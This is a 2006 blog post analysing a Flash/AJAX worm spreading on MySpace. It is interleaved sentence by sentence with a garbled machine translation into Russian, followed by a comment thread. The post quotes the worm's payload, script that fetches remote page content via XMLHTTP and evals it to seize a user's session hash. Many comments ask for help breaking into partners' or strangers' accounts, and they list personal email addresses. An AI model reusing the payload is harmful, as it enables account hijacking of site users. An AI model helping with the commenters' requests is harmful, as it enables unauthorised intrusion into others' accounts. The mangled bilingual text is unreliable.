Hacking MySpace: How Flash & AJAX Based Worm Works Взлом MySpace: как Flash и AJAX основана червь работает
MySpace has been infected by Flash based (swf) worm which spreading rapidly through MySpace. MySpace были заражены основе Flash (swf) червь который быстро распространяется через MySpace. It is embedding JavaScript code into users’ profiles that redirects visitors to a site claiming the US government was behind the 9/11 terrorist attacks, Symantec Это вложение JavaScript код на пользователей, профили, который перенаправляет посетителей на сайт утверждая, правительство США за 9 / 11 террористических нападений, Symantec warned предостерег Monday. Понедельник. However it may be just the tip of the iceberg. Однако он может быть лишь вершиной айсберга. Let’s take a look at how it works to understand how it can be easily modified to deliver much devastating payloads. Давайте посмотрим, как она работает, чтобы понять, каким он может быть легко изменена по оказанию столь разрушительные полезной нагрузки.
The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file. Неназванных червь не опасный, но Shockwave Flash (. Swf) файлов, содержащих полезную нагрузку встроенное JavaScript в профиль любого пользователя MySpace которые мнениями. Swf файла. This can easily replicate Это может легко воспроизвести Samy is my friend Сами является моим другом worm without breaking a sweat. Червь, не нарушая пота.
This javascript code would then be interpreted by any user who visited the site, allowing sensitive data to be stolen, such as a hash value required to carry out operations as a user, and performing operations on behalf of that users (without consent obviously). Этот код javascript затем будет интерпретироваться любым пользователем, которые посетили сайт, позволяющий чувствительных данных, которые будут украдены, как, например, хэш-значение, необходимых для проведения операций, как пользователя, так и проведение операций от имени этого движения (без его согласия, очевидно). Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site. В настоящее время, что доступ в настоящее время используется только для распространения JavaScript код на другие обзоры популярной социальной сети.
If the payload is malicious, it can carry out secondary attacks like targeting recently discovered vulnerabilities affecting Microsoft Office content. Если полезная нагрузка является вредоносной, он может осуществлять нападения, как среднее ориентации недавно обнаруженных уязвимостей Microsoft Office, затрагивающих содержание. The impact would be much higher exposing even sensitive information on your hard-disk. Последствия будут гораздо выше, обнажая даже конфиденциальную информацию на жестком диске.
Let’s take a look at the worm, thanks to research by Давайте взглянем на червя, благодаря исследований kinematic.theory :
When you visited an already infected page, there is a Flash object embedded (”redirect.swf”) which contains the actionscript: Когда вы посетили уже зараженные страницы, имеется встроенный Flash объект ( "redirect.swf"), которая содержит actionscript:
getURL(" getURL ( " url url “); ");
It opens and redirects you to the specified blog URL. Он открывает и перенаправляет вас на указанный URL блога.
On this blog url there is another flash file embedded - “retrievecookie.swf”. Об этом Адрес блога есть еще один флэш-файла встроенного - "retrievecookie.swf". It contains: Она содержит:
getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\' getURL ( "javas \ n \ rcript: var = х новых ActiveXObject (\ 'Msxml2.XMLHTTP \'); x.open (\ 'GET \", \ "http://editprofile.myspace.com/index.cfm? fuseaction = user.HomeComments и friendID = 93634373 \ ', верно); x.onreadystatechange = функция () (если (x.readyState == 4) (var пг = x.responseText; var = pg.substring п / п (pg.indexOf (\ "BX-\ ') +3, pg.indexOf (\'-EX \ ')), а ((sc.indexOf (\'
\’)!=-1)||(sc.indexOf(\’-XXX\’)!=-1)){var n=sc.indexOf(\’ \')!=- 1) | | (sc.indexOf (\ '-XXX \')!=- 1)) (var n = sc.indexOf (\'
\’);if(n==-1)n=sc.indexOf(\’-XXX\’);sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};” + “eval(sc);}};” + “x.send(null);”, “”); \ '); Если (n ==- 1) № = sc.indexOf (\'-XXX \ '); sc.substring п / п = (0 Н) + sc.substring (n +5, sc.length); ); "+" Eval (ПК );}};" + "x.send (нулевой);", "");
It opens another blog post ( Это открывает еще один блога ( link ссылка ) and evaluates its contents. ) И оценивает ее содержание.
This code gets your MySpace hash which allows anyone to act as you on MySpace and perform any operations on your behalf like changing your password or adding someone unknown as your friend, anything you can do on MySpace. Этот код запускается на вашем MySpace хеширования, которая позволяет кому бы то ни было действия, как вы на MySpace и производить любые операции от своего имени, как изменить свой пароль или добавления кто-то неизвестный, как ваш друг, все, что вы можете делать на MySpace. Currently the code adds a message to your MySpace profile. В настоящее время код добавляет сообщения на Ваш MySpace профиля. It extensively use AJAX for its operations. Она широко использовать AJAX для своей деятельности.
Filed under Поданного в соответствии с Computer Security Computer Security , Headline News Headline News , How To Как , MySpace , Social Networking Социальная Networking , Spam Watch Спам Часы , Web Веб , Web Services Web Services | |
| |
RSS 2.0 RSS 2,0 | |
Trackback this Article | это статья |
Email this Article Отослать Статья
You may also like to read Вы можете также люблю читать |



July 18th, 2006 at 12:36 pm 18 июля 2006 года в 12:36 вечера
hey Эй
if you happen to have a spare minute and feel like doing some technical charity work by expalining a few things to me, i would be most grateful. если вам случится иметь запасные минуты и чувствуешь себя как делают некоторые технические благотворительной деятельности expalining кое-что для меня, я был бы весьма признателен.
my email is мои письма rachel_franciscova@yahoo.com
my aim is AKLsweetheart моя цель заключается в том, AKLsweetheart
thank you благодарю Вас
July 18th, 2006 at 1:48 pm 18 июля 2006 года в 1:48 вечера
Rachel, Рейчел,
Send me your requirements using the Присылайте мне ваши требования, используя contact form контактная форма .
– Angsuman -- Angsuman
July 18th, 2006 at 9:14 pm 18 июля 2006 года в 9:14 вечера
Another Worm, This Time on Myspace Другой червь, на этот раз на Myspace
Over at Simple Thoughts, they disect a Flash/AJAX worm that has been laying waste to MySpace. Более простой в мыслях, они disect Flash / AJAX-червь, была укладка отходов на MySpace. The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who Неназванных червь не опасный, но Shockwave Flash (. Swf) файлов, содержащих полезную нагрузку встроенное JavaScript в профиль любого пользователя MySpace которые
August 15th, 2006 at 8:21 pm 15 августа 2006 года в 8:21 вечера
help i need 2 hack into my bf myspace his email поможет мне нужно 2 взломать в мою завтрака myspace его по электронной почте pittbull2332@yahoo.com help!!!!!!!!!!11 помощь !!!!!!!!!! 11
August 28th, 2006 at 3:34 pm 28 августа 2006 года в 3:34 вечера
what are u on myspace cuz i cant view the blogs that какие у о myspace cuz я могу мнение о том, что блоги
u put on here у-поставить здесь
September 2nd, 2006 at 12:51 am 2 сентября 2006 года в 12:51 утра
sum1 went into my profile but never gave me my password if sum1 has plzzzzzzz lemme no….my email addy is sum1 пошел в свой профиль, но так и не дала мне мой пароль, если sum1 имеет plzzzzzzz lemme нет…. мой адрес электронной почты является addy lazyiegurl23@yahoo.com thanks благодарность
October 12th, 2006 at 7:06 am 12 октября 2006 года в 7:06 утра
i need to get into my girlfriends myspace to see if she cheatin on with with one of my mates Мне нужно попасть в моих подруг myspace, чтобы видеть, насколько она cheatin о с с одним из моих товарищей
October 21st, 2006 at 8:34 pm 21 октября 2006 года в 8:34 вечера
help i need to hack into my bf’s myspace, i need to see what kind of mails hes getting. поможет мне нужно взломать в мою завтрака в myspace, мне нужно увидеть, какие письма hes получают. Hes cheating im sure Hes обманывают-им обязательно
October 23rd, 2006 at 1:02 am 23 октября 2006 года в 1:02 утра
i need to hack into my bf’s myspace, i need to see what kind of mails hes getting just very curious bout it. Мне нужно взломать в мою завтрака в myspace, мне нужно увидеть, какие письма hes получить только очень любопытный бой его. i dunno if He is cheating.but just wanna kno thnx. я знаю, если он cheating.but просто хочет kno thnx. plz help plz помощь
October 26th, 2006 at 3:14 pm 26 октября 2006 года в 3:14 вечера
i dont know if you will help me but at least i hope you read this. dont я знаю, если Вы поможете мне, но по крайней мере, я надеюсь, Вы читаете эти строки.
i dont want you to hack into my profile cause of a boyfriend or stuff like that cause i would just ask. dont я хочу, чтобы взломать в своем профиле причиной приятелем или вещи, как о том, что причиной я бы просто спросить.
but one day i changed my password and i wasnt paying attencion, so i dont remember what i changed it to. но один день я изменился свой пароль и я wasn't уплаты attencion, поэтому я dont помните, что я изменился его.
the problem with the forget your pass word link thing is. Проблема с забудете передать слова Дело в ссылке. i dont remember my yahoo password eaither. dont я помню мой пароль eaither yahoo.
i know im stupid, and i been very very depressed ever sense myspace. я знаю им глупо, и я был очень-очень низких когда-либо смысле, myspace.
i use to go on it when i was bored it made me happy. Я использую идти по ней, когда мне было скучно он сделал меня счастливой.
and now i been so misarble without it i dont know what to do. и теперь я настолько misarble без него dont я знаю, что делать.
i have tried everything. Я испробовала все.
im desprate please just take a mommment of your time and email me the steps or something. desprate им просто принять mommment вашего времени и по электронной почте мне или какому-то шаги.
my email is, мои письма,
candygurrl34@hotmail.com
please. пожалуйста.
November 7th, 2006 at 6:26 pm 7 ноября 2006 года в 6:26 вечера
hello, Здравствуйте,
well yeah like the person ^ ^ ^ there said, i have the same problem. Да так, как человек ^ ^ ^ там говорил, я же проблемы.
I cant rememebr my myspace password and well the email address in which i used to log in with is now cancelled ( is an old address ). Я могу rememebr myspace мой пароль, а также адрес электронной почты, в которых я использоваться для войти в настоящее время отменен (это старый адрес).
If there’s some1 that can help me solve my probelmi will be very greatful and will really appreciate it. Если существует some1, которые могут помочь мне решить мои probelmi буду очень признателен, и будет очень признательны за это.
I’ve asking for help since the past weel and apparently no one knows. Я с просьбой о помощи, поскольку последние weel, видимо, никто не знает.
thanks, Jenny. спасибо, Йенни.
November 15th, 2006 at 3:09 pm 15 ноября 2006 года в 3:09 вечера
i have a question! Я имею вопрос! i know javascript is disabled in myspace, but how then, did i come across a user that created a SECOND picture page in their profile. я знаю ЯАВАСЦРИПТ инвалидов в myspace, но как тогда, я сделал встретить пользователя, который создал страницу втором снимке в своем профиле.
when you hover the mouse above the “NEXT” link, it reads in the lower left corner of the web browser “javascript:_doPostBack(’ctl00$Main$ImageListings1$PagerBottom’,'2′)” Вы когда курсор мыши над "NEXT" ссылку, она читает в нижнем левом углу браузера "javascript: _doPostBack ( 'ctl00 $ $ Главная ImageListings1 $ PagerBottom','2 ')"
then when you get to the second page the url reads “http://viewmorepics.myspace.com/Modules/ViewMorePics/Pages/ViewMorePics.aspx?%3ffuseaction=user.viewPicture&friendID=858155&MyToken=c6997aa3-bbeb-46ba-bbce-ee557f99b255″ Затем, когда вы получаете на второй странице url читает "http://viewmorepics.myspace.com/Modules/ViewMorePics/Pages/ViewMorePics.aspx? 3ffuseaction% = user.viewPicture и friendID = 858155 и MyToken = c6997aa3-bbeb-46ba-bbce-ee557f99b255 "
i want to know how to do the same thing to mine! Я хочу знать, как сделать то же самое, связанной с разминированием! if anyone knows how to embed these codes into my site please respond! если кто знает как вставлять эти коды на мой сайт пожалуйста, ответьте!
thank you! спасибо!
November 23rd, 2006 at 4:38 pm 23 ноября 2006 года в 4:38 вечера
can i know how to hack into someones myspace i really need to plz help send me a message at Могу ли я знать, как кому-то взломать в myspace я действительно необходимо помочь plz, вышлите мне сообщение на truebiitch305@aol.com
November 27th, 2006 at 11:22 pm 27 ноября 2006 года в 11:22 вечера
i need help lz some1 help me i need to get my myspace password and my email is fake so if u can get back at me Мне нужна помощь Л. З. some1 поможет мне нужно я получу свой пароль и myspace моего письма является поддельной поэтому, если у могут вернуться на меня plz…smile5toeddie@yahoo.co plz… smile5toeddie@yahoo.co ,
November 27th, 2006 at 11:22 pm 27 ноября 2006 года в 11:22 вечера
i need help lz some1 help me i need to get my myspace password and my email is fake so if u can get back at me plz…. Мне нужна помощь Л. З. some1 поможет мне нужно я получу свой пароль и myspace моего письма является поддельной поэтому, если у могут вернуться на меня plz…. get back at me вернуться на меня
December 5th, 2006 at 11:32 pm 5 декабря 2006 года в 11:32 вечера
i really need to get in to my wifes myspace plz help email me at я действительно нужно, чтобы в мою жен myspace plz помочь мне на адрес электронной почты livesk8er69@yahoo.com
December 10th, 2006 at 8:43 pm 10 декабря 2006 года в 8:43 вечера
how do u hack into pplz profile on myspace if u got thier email??? Как у взломать в pplz анкету на myspace, если у их получили по электронной почте?
December 10th, 2006 at 8:47 pm 10 декабря 2006 года в 8:47 вечера
can sum 1 send me the password to 1 сумма может выслать мне пароль subrina@yahoo.com for myspace? для MySpace?
December 11th, 2006 at 1:26 pm 11 декабря 2006 года в 1:26 вечера
Hi, Привет,
Someone apparently got into my myspace page and was sending out bulletins inviting people to sex sites. Кто-видимому, попал мой myspace странице и рассылка бюллетеней, приглашать людей к секс-сайтов. A friend told me that the same thing happened to her brother and suggested that I change my password. Друг рассказал мне о том, что же случилось с ее братом, и предложил, что я изменить свой пароль. I must not have been paying attention because the password I thought I changed it to isnt working. Я не должны были обратить внимание, поскольку пароль, я подумал Я изменил ей isn't работает. The other problem is that the email address I usewd to set up the account is for my last school and I have since transferred, so now I have no access at all. Другая проблема заключается в том, что адрес электронной почты, я usewd создать учетную запись для моего последнего школу, и я с тех пор передается, так что теперь у меня нет доступа к нему на всех. I tried contacting Myspace but they keep sending me the same automated responses that don’t help. Я попытался связаться с Myspace но продолжайте отправлять мне же автоматизированного ответов, которые не помогают. If you could help me get back in to my account I would appreciate. Если бы вы могли помочь мне вернуться в мою учетную запись Буду признателен. I have a brother in Iraq and the only way I can keep in contact with him is through Myspace. Я брата в Ираке, и единственным способом я могу держать в контакте с ним через MySpace.
Thanks Спасибо
December 21st, 2006 at 12:00 am 21 декабря 2006 года в 12:00 утра
i need help hacking into my myspace and sum1 elses for revenge!! Мне нужна помощь хакерство в мою myspace и sum1 elses мести! they’ve bin spittin shiit about me on MY myspace for the past 3 MONTHS PLEASE HELP and e-mail me at они бен spittin shiit обо мне в моем myspace за последние 3 месяца Пожалуйста, помогите и электронной почте мне dirtymex77@hotmail.com
December 23rd, 2006 at 1:44 am 23 декабря 2006 года в 1:44 утра
dude i need to know how to hack into other peoples myspaces. dude я необходимо знать, как взломать на другие народы myspaces. please let me know it would be greatly appreciated. пожалуйста, дайте мне знать, было бы весьма признателен.
January 2nd, 2007 at 3:23 am 2 января 2007 года в 3:23 утра
i need to know how to hack into other peoples myspaces too. Мне необходимо знать, как взломать на другие народы myspaces тоже. i would greatly appreciate it if u help me Буду весьма признателен, если у помогите мне
January 8th, 2007 at 7:04 pm 8 января 2007 года в 7:04 вечера
i need the paasword to я потребность к paasword swardfox@hotmail.com as he has deleted my myspace lopads of times messed my msn up and talked to my friends i just want to sh it show him how it feels then hopefully he will leave me alone and i know i got hbim back for all the grief hes give me please give me the password to как он удалил мой myspace lopads раз messed мой msn и разговаривал с моими друзьями я просто хочу показать это ш его, как он считает, тогда мы надеемся, он оставит меня в покое, и я знаю я получил обратно hbim для всех горе hes дайте мне пожалуйста, дайте мне пароль swardfox@hotmail.com thankyou so much it would mean alot xx большое спасибо столько это будет означать много хх
January 13th, 2007 at 6:46 pm 13 января 2007 года в 6:46 вечера
Hi, It’s not easy to delete someone’s myspace account, it may be someone who knows your password to myspace and your email account must have deleted your myspace.It may be someone who uses the same computer with you… Привет, это не просто удалить кого-то myspace счет, он может быть лицо, которые знают пароль, чтобы myspace и Вашей учетной записи электронной почты должен быть исключен ваши myspace.It может быть кто-то использует которые одном компьютере с вами…
January 13th, 2007 at 6:48 pm 13 января 2007 года в 6:48 вечера
The solution for your problem is, Just ask me what my password is………..!!! Решение для вашей проблемы есть, просто спросите меня, что мой пароль……… ..!!! isn’t that straigh forward………….!! не в том, что straigh вперед………….! GET LOST GET LOST
January 19th, 2007 at 11:05 am 19 января 2007 года в 11:05 утра
i need to get in my grls profile i have her username but not her password help MEEEEE Мне нужно попасть в мой профиль я grls, его имя пользователя, но не ее пароль помощь MEEEEE
January 24th, 2007 at 8:00 pm 24 января 2007 года в 8:00 вечера
I need to help hacking into my girlfriends myspace to see if she is cheating. Мне нужно, чтобы помочь хакерство в мою подруг myspace, чтобы видеть, насколько она является обманом. Please help. Пожалуйста, помогите.
February 1st, 2007 at 11:43 pm 1 февраля 2007 года в 11:43 вечера
ROFL… you people are pathetic wanting to hack into your BG and GF pages! ROFL… вы люди жалким хочет взломать в вашу BG и GF страниц! OMG im so insecure and unsure of myself! OMG им настолько ненадежно, и уверены в себе!
February 4th, 2007 at 12:30 pm 4 февраля 2007 года в 12:30 вечера
The man I was with-cheated on me and eventually left me for another myspace female. Я был человеком с обманутыми-на меня и, в конечном итоге покинул меня за myspace другой женщиной. We are ADULTS. Мы взрослые. Now he is taunting me via myspace and other ways.SO is the new GF. Теперь он taunting мне через myspace и других ways.SO является новым GF.
Before he and I split up, he broke into my home and stole over 40K worth of jewelry now he is in hiding.If I could get into his myspace I could possibly get some of my things back.I’m also the mother of his son. Прежде чем он и я разделятся, он ворвались в мой дом и похитили свыше 40K ювелирных изделий на сумму в настоящее время он находится в hiding.If я мог попасть в его myspace Я мог бы, возможно, получить некоторые мои вещи back.I "м Кроме того, мать его сын. Please help us. Пожалуйста, помогите нам.
February 4th, 2007 at 10:23 pm 4 февраля 2007 года в 10:23 вечера
Gina, Джина,
You should contact the cops & FBI and file a case against your boyfriend. Вам следует связаться с ФБР и полицейских и подавать дело в отношении вашего жениха. They can force MySpace to reveal the details of their profile. Они могут заставить MySpace раскрывать подробности своего профиля.
Wish you best of luck. Желаем Вам удачи.
February 21st, 2007 at 12:11 am 21 февраля 2007 года в 12:11 утра
Hey!! Эй! Can somebody help me with finding out my gf’s myspace password? Может ли кто-нибудь поможет мне найти мою gf в myspace пароль? I’m afraid she is cheating. Боюсь, она является обманом. Her email address is Ее адрес tanyamendis@hotmail.com
Mine is Шахта digital52306@hotmail.com
February 21st, 2007 at 2:23 pm 21 февраля 2007 года в 2:23 вечера
i need the password for my myspace account but its not valid i cant sign on && it an emergency my working email is я необходимость пароль для myspace моей учетной записи, но ее не действительны я могу подписать и он и чрезвычайных моей работы электронной почты xxminnie420xx@yahoo.com thanxs i appreciate it thanxs я признателен
February 21st, 2007 at 2:24 pm 21 февраля 2007 года в 2:24 вечера
my myspace account email is MySpace моей учетной записи электронной почты playa42088@msn.com but i cant sign on i need the password send the password to но я могу подписать я пароль нужно отправить пароль xxminnie420xx@yahoo.com
February 25th, 2007 at 11:23 am 25 февраля 2007 года в 11:23 утра
how can i get someones password to their myspace account so i can see their private messages? Как я могу получить пароль, чтобы кому-то их myspace учетную запись, чтобы я их можете увидеть личные сообщения?
March 7th, 2007 at 11:03 pm 7 марта 2007 года в 11:03 вечера
hi.. привет .. i dont know how this thing works. dont я знаю, как эта вещь работает.
or if you eve ngoingto get back to me on this message. или если вы накануне ngoingto вернемся ко мне на это послание.
i find it pretty weird how everyone wants to know how to find someones pass word. я считаю довольно странным, каким образом каждый хочет знать, как найти кому-то передать слова.
i wouldnt want that done to me. я хочу wouldnt, что сделано для меня.
but if youu could message me back asap но если youu сообщение могло бы мне вернуться как можно скорее
i would apreciate it я бы его apreciate
i have this friend that told me they know how to get into peoples profiles. Я это друг рассказал мне о том, что они знают, как проникнуть народов профилей. and im afraid i might be next. и я им бояться может быть следующей.
i dont want them to get into mines too!! я dont хотим, чтобы они попадают в шахтах слишком!
wat do i do!!!!! Ват мне делать !!!!!
March 13th, 2007 at 9:38 pm 13 марта 2007 года в 9:38 вечера
help i need 2 hack into my bf myspace поможет мне нужно 2 взломать в мою завтрака myspace
March 16th, 2007 at 5:35 pm 16 марта 2007 года в 5:35 вечера
how can i get my girls myspace password… Как я могу получить свой пароль myspace девочек…
I know her email address…… Я знаю ее адрес электронной почты……